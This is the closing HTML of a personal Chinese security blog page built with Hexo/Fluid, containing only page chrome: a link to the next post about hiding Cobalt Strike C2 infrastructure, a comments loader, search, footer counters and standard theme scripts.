                      <a href="/2022/04/13/APT%E7%BA%A7CS%E9%9A%90%E8%97%8F%E6%95%99%E7%A8%8B%EF%BC%9A%E4%BD%BF%E7%94%A8%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E3%80%81C2-Profile%E5%92%8CCDN%E6%8B%89%E6%BB%A1%E6%BA%AF%E6%BA%90%E9%9A%BE%E5%BA%A6/" title="APT级CS隐藏教程：使用反向代理、C2-Profile和CDN拉满溯源难度">
                        <span class="hidden-mobile">APT级CS隐藏教程：使用反向代理、C2-Profile和CDN拉满溯源难度</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  <article id="comments" lazyload>
    
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'github-light';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'M0cK1nG-b1Rd/blog-comments');
      s.setAttribute('issue-term', 'title');
      
      s.setAttribute('label', 'utterances');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


  </article>


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://M0cK1nG-b1Rd.github.io" target="_blank" rel="nofollow noopener"><span>M0cK1nG-b1Rd</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Powered by Hexo&Fluid</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  

  

  

  

  

  

  
    
  




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.0/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      headingSelector : CONFIG.toc.headingSelector || 'h1,h2,h3,h4,h5,h6',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      collapseDepth   : CONFIG.toc.collapseDepth || 0,
      scrollSmooth    : true,
      headingsOffset  : -boardTop
    });
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
  });
</script>


  <script>
  (function() {
    var enableLang = CONFIG.code_language.enable && CONFIG.code_language.default;
    var enableCopy = CONFIG.copy_btn;
    if (!enableLang && !enableCopy) {
      return;
    }

    function getBgClass(ele) {
      return Fluid.utils.getBackgroundLightness(ele) >= 0 ? 'code-widget-light' : 'code-widget-dark';
    }

    var copyTmpl = '';
    copyTmpl += '<div class="code-widget">';
    copyTmpl += 'LANG';
    copyTmpl += '</div>';
    jQuery('.markdown-body pre').each(function() {
      var $pre = jQuery(this);
      if ($pre.find('code.mermaid').length > 0) {
        return;
      }
      if ($pre.find('span.line').length > 0) {
        return;
      }

      var lang = '';

      if (enableLang) {
        lang = CONFIG.code_language.default;
        if ($pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2 && $pre.children().hasClass('hljs')) {
          lang = $pre[0].children[0].classList[1];
        } else if ($pre[0].getAttribute('data-language')) {
          lang = $pre[0].getAttribute('data-language');
        } else if ($pre.parent().hasClass('sourceCode') && $pre[0].children.length > 0 && $pre[0].children[0].classList.length >= 2) {
          lang = $pre[0].children[0].classList[1];
          $pre.parent().addClass('code-wrapper');
        } else if ($pre.parent().hasClass('markdown-body') && $pre[0].classList.length === 0) {
          $pre.wrap('<div class="code-wrapper"></div>');
        }
        lang = lang.toUpperCase().replace('NONE', CONFIG.code_language.default);
      }
      $pre.append(copyTmpl.replace('LANG', lang).replace('code-widget">',
        getBgClass($pre[0]) + (enableCopy ? ' code-widget copy-btn" data-clipboard-snippet><i class="iconfont icon-copy"></i>' : ' code-widget">')));

      if (enableCopy) {
        Fluid.utils.createScript('https://lib.baomitu.com/clipboard.js/2.0.10/clipboard.min.js', function() {
          var clipboard = new window.ClipboardJS('.copy-btn', {
            target: function(trigger) {
              var nodes = trigger.parentNode.childNodes;
              for (var i = 0; i < nodes.length; i++) {
                if (nodes[i].tagName === 'CODE') {
                  return nodes[i];
                }
              }
            }
          });
          clipboard.on('success', function(e) {
            e.clearSelection();
            e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-copy', 'icon-success');
            setTimeout(function() {
              e.trigger.innerHTML = e.trigger.innerHTML.replace('icon-success', 'icon-copy');
            }, 2000);
          });
        });
      }
    });
  })();
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="/js/leancloud.js" ></script>




  
<script src="//picbedddd.oss-cn-beijing.aliyuncs.com/blog/scripts/DynamicRibbon.min.js"></script>
<script src="//picbedddd.oss-cn-beijing.aliyuncs.com/blog/scripts/star.min.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"left","width":250,"height":500,"hOffset":-30,"vOffset":-150},"mobile":{"show":true,"scale":0.5},"log":false});</script></body>
</html>
